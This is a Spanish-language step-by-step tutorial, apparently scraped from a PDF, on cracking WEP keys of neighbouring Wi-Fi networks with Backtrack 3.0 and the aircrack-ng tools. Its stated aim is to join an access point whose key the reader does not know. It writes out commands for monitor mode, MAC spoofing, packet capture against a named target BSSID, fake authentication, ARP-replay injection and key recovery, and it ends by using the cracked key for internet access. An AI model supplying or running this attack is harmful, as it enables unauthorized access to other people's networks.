You are on page 1of 7

Cracking WEP con Backtrack 3.

0 para Tarjetas Atheros AR5007

TUTORIAL PARA DESCIFRAR WEP CON


BACKTRACK 3.0 PARA TARJETAS ATHEROS
AR5007
En este tutorial explicaré como descifrar o crackear claves WEP de 64 y
128 bits paso a paso en muchos puntos de acceso WIFI y routers
utilizando Backtrack 3.0, una distribución live de Linux. El principal
objetivo de este tutorial es que queremos conectarnos a un punto de
acceso que utiliza la encriptación WEP (generalmente Infinitum en
México), pero no sabemos la clave. Vamos a atacar el router WIFI
generando o capturando paquetes para así poder obtener la clave WEP.

Este tutorial también es aplicable a muchas otras tarjetas wireless, pero


me he dado a la tarea de escribirlo para la Atheros AR5007 (el cual
deberá funcionar en los otros modelos), ya que algunas tarjetas de
equipos nuevos son difíciles de levantar con otras distribuciones live
(algunos pensarían que imposible), pues bien aquí les presento la
solución paso a paso, principalmente pensado para principiantes en el
mundo del Hacking.

Requisitos:
• CD Backtrack 3.0

• Tarjeta Wireless Atheros AR5007 (en este caso) o alguno que sea
compatible con el estándar 802.11.

Preparación de la tarjeta Wifi


Paso 1. En primer lugar se debe de habilitar el “modo monitor” en la
tarjeta wireless. Pero primeramente verificaremos si el sistema ha
reconocido nuestra tarjeta wireless, para ello abriremos una Shell
(ventana de comandos) y teclearemos el siguiente comando:

iwconfig

By: Reyes (reyes_g2505@hotmail.com)


Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007

Deberá de aparecer algo similar a lo que a continuación se aprecia:

Y
tomaremos nota de nuestro adaptador wireless, principalmente del
nombre de la interfaz.

Paso 2. Procederemos a detener nuestra interfaz, tecleamos lo


siguiente:

En general(sintaxis estándar para otras tarjetas).

Airmon-ng stop [device]

Para nuestro caso (usuarios con atheros):

airmon-ng stop ath0

Paso 3. Tecleamos este comando para poder hacer el cambio de la


dirección MAC:

ifconfig [interface] down

Para Atheros:

ifconfig wifi0 down

Paso 4. Cambiamos la dirección MAC, tecleamos lo siguiente:

macchanger –m 00:11:22:33:44:66 [device]

By: Reyes (reyes_g2505@hotmail.com)


Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007

Para Atheros:

macchanger –m 00:11:22:33:44:66 wifi0

Paso 5. En el siguiente paso al iniciar nuestra tarjeta se habilitará en


modo monitor, tecleamos:

airmon-ng start [device]

Para Atheros:

airmon-ng start wifi0

Atacar el objetivo
Paso 6. Ahora buscaremos una red con seguridad WEP habilitada, para
ello abriremos otra Shell (sin cerrar las anteriores) y teclearemos lo
siguiente:

airodump-ng [device]

Para Atheros:

airodump-ng ath0

Y desplegará lo siguiente:

By: Reyes (reyes_g2505@hotmail.com)


Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007

En este caso el objetivo es la red infinitum. Asegurese de tomar notade


la dirección MAC(BSSID), el canal(CH) y el nombre de la red(ESSID).

Paso 7. Ahora tenemos que recoger datos de los puntos de accesos


WIFI para el ataque, Abriremos otra Shell y teclearemos lo siguiente:

airodump-ng –c [channel] -w [filename] –bssid [bssid] [device]

Para Atheros:

airodump-ng –c 8 –w paquetes –bssid 00:1F:B3:EC:09:F9 ath0

Este comando es la salida de datos recogido en un fichero que en


nuestro caso es paquetes. Este archivo se genera y alimenta en el
programa de WEP, con él descifraremos la clave WEP.

Paso 8. Abriremos otra Shell y dejaremos el anterior en funcionamiento


(de igual forma las anteriores y posteriores Shell). Ahora tenemos que
generar algunos falsos paquetes al punto de acceso para acelerar la
salida de datos y poder asociarnos a la red objetivo. Para esto
introduciremos el siguiente comando:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

Para Atheros:

aireplay-ng -1 0 –a 00:1F:B3:EC:09:F9 –h 00:11:22:33:44:66 –e


INFINITUM7508 ath0

By: Reyes (reyes_g2505@hotmail.com)


Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007

Paso 9. A continuación generaremos un gran número de paquetes en


la red Objetivo con el fin de descifrar la clave, tecleamos lo siguiente (En
otra Shell):
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

Para Atheros:

Aireplay-ng -3 –b 00:1F:B3:EC:09:F9 –h 00:11:22:33:44:66 ath0

Esto fuerza al punto de acceso a enviar un montón de paquetes que


podamos utilizar para romper la clave WEP. Revise aerodump-ng y usted
debería de ver los datos con la selección de llenado de los paquetes.
(Pongo las imágenes diferentes ya que al hacer el tutorial no me fue
posible encontrar las otras pantallas, pero es algo similar, guíese de los
comandos).

Paso 10. Despues de unos 10,000 a 20,000 IVS (visto en #Data, en la


pantalla anterior)pude comenzar a descifrar la clave WEP si no hay otras
maquinas generando paquetes, introduzca este comando para probar:

By: Reyes (reyes_g2505@hotmail.com)


Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h


00:11:22:33:44:66 [device]

Para Atheros:

aireplay -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b 00:1F:B3:EC:09:F9 -h

00:11:22:33:44:66 ath0

Paso 11. Una vez que haya suficientes paquetes comenzaremos con el
crack, para ello tecle lo siguiente (note que el filename es el nombre del
archivo que definimos en los primeros pasos):
aircrack-ng -n 128 -b [bssid] [filename]-01.cap

Para Atheros:

aircrack-ng -n 128 -b 00:1F:B3:EC:09:F9 paquetes-01.cap

By: Reyes (reyes_g2505@hotmail.com)


Cracking WEP con Backtrack 3.0 para Tarjetas Atheros AR5007

La “-n 128 ” significa una clave WEP de 128 bits de encriptación, intente
una clave de 64 bits cambiando el valor de n a 64.

Una vez obtenida la clave lo copia y ya en Windows podrá introducirla


(sin los dos puntos) para tener acceso a internet.

Que lo disfrutes!!!!!

By: Reyes (reyes_g2505@hotmail.com)